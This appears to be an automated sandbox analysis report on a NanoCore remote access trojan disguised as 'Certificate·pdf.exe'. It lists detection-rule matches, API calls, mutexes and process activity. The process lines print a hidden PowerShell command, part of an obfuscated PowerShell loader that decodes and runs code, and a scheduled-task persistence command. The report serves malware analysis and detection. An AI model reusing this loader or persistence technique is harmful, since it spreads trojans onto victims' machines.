Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000002.28397844456.00000000219A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@13/15@189/2

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040336C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23D62EE2 AdjustTokenPrivileges,		5_2_23D62EE2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23D62EAB AdjustTokenPrivileges,		5_2_23D62EAB

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

Code function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046FF

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

File created: C:\Users\user\AppData\Local\Skamflelsens

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4800:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4800:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:304:WilStaging_02
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{48e0e383-40c8-47b1-a4ea-d717ed94d829}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:304:WilStaging_02

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nsk2A12.tmp

Jump to behavior

Source: Certificate#U00b7pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Certificate#U00b7pdf.exe	ReversingLabs: Detection: 31%
Source: Certificate#U00b7pdf.exe	Virustotal: Detection: 53%

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

File read: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Certificate#U00b7pdf.exe "C:\Users\user\Desktop\Certificate#U00b7pdf.exe"
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas''
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe 0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas''			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 